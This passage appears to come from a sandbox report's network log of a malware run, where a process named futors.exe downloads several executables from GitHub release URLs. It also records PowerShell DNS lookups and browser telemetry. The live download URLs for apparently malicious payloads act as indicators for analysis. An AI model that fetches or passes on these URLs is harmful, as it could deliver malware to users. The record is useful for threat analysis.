style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403D1D:5041E8:67B67893
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403ECB:504427:67B6789B
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:44 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:4040ED:5046DB:67B678A0
                                                                                            • flag-us
                                                                                              DNS
                                                                                              i.instagram.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              i.instagram.com
                                                                                              IN A
                                                                                              Response
                                                                                              i.instagram.com
                                                                                              IN CNAME
                                                                                              instagram.c10r.instagram.com
                                                                                              instagram.c10r.instagram.com
                                                                                              IN A
                                                                                              163.70.151.63
                                                                                            • flag-us
                                                                                              DNS
                                                                                              objects.githubusercontent.com
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              Response
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.108.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.110.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.111.133
                                                                                              objects.githubusercontent.com
                                                                                              IN A
                                                                                              185.199.109.133
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 20365153
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Tue, 11 Feb 2025 17:47:37 GMT
                                                                                              ETag: "0x8DD4AC42CABB08E"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: e3e51486-101e-006b-5dad-7c66a1000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Tue, 11 Feb 2025 17:47:37 GMT
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=trano1221.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 4262
                                                                                              Date: Thu, 20 Feb 2025 00:34:18 GMT
                                                                                              X-Served-By: cache-iad-kcgs7200119-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 1, 0
                                                                                              X-Timer: S1740011658.750016,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 358400
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Thu, 13 Feb 2025 22:40:28 GMT
                                                                                              ETag: "0x8DD4C7F6A75E5D3"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: c7acd6d4-001e-0067-7668-7ef1a9000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Thu, 13 Feb 2025 22:40:28 GMT
                                                                                              x-ms-blob-content-md5: qOrTFoeSYXKTn2wfQLbMMQ==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=con12312211221.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 4286
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              X-Served-By: cache-iad-kjyo7100179-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 29, 0
                                                                                              X-Timer: S1740011667.106967,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 356894
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Sun, 16 Feb 2025 14:38:54 GMT
                                                                                              ETag: "0x8DD4E97A385FA05"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: 04f1f775-201e-0002-7a80-805fed000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Sun, 16 Feb 2025 14:38:54 GMT
                                                                                              x-ms-blob-content-md5: zoaUIANmZaIoyGWZNh8EIw==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=12321321.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 3723
                                                                                              Date: Thu, 20 Feb 2025 00:34:36 GMT
                                                                                              X-Served-By: cache-iad-kiad7000042-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 30, 0
                                                                                              X-Timer: S1740011676.919650,VS0,VE2
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 353280
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Mon, 17 Feb 2025 00:17:41 GMT
                                                                                              ETag: "0x8DD4EE87E7807E5"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: 2412be9a-401e-0004-03d1-806c52000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Mon, 17 Feb 2025 00:17:41 GMT
                                                                                              x-ms-blob-content-md5: EvXHLtRrRzCjAZBTv1zCBg==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=alex12112.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 3819
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              X-Served-By: cache-iad-kcgs7200032-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 36, 0
                                                                                              X-Timer: S1740011680.378935,VS0,VE1
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.199.108.133:443
                                                                                              Request
                                                                                              GET /github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                              Host: objects.githubusercontent.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 696832
                                                                                              Content-Type: application/octet-stream
                                                                                              Last-Modified: Wed, 19 Feb 2025 16:14:22 GMT
                                                                                              ETag: "0x8DD510078CCBC40"
                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                              x-ms-request-id: f4315236-101e-0036-38e9-826c25000000
                                                                                              x-ms-version: 2025-01-05
                                                                                              x-ms-creation-time: Wed, 19 Feb 2025 16:14:22 GMT
                                                                                              x-ms-blob-content-md5: qKWDqIARGmO8gQN+4CSOGQ==
                                                                                              x-ms-lease-status: unlocked
                                                                                              x-ms-lease-state: available
                                                                                              x-ms-blob-type: BlockBlob
                                                                                              Content-Disposition: attachment; filename=fher.exe
                                                                                              x-ms-server-encrypted: true
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Fastly-Restarts: 1
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 2225
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              X-Served-By: cache-iad-kjyo7100172-IAD, cache-lon420138-LON
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 56, 0
                                                                                              X-Timer: S1740011685.988932,VS0,VE1
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              IN A
                                                                                              Response
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              IN CNAME
                                                                                              blobcollector.events.data.trafficmanager.net
                                                                                              blobcollector.events.data.trafficmanager.net
                                                                                              IN CNAME
                                                                                              onedsblobprdeus15.eastus.cloudapp.azure.com
                                                                                              onedsblobprdeus15.eastus.cloudapp.azure.com
                                                                                              IN A
                                                                                              20.42.73.29
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:20 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
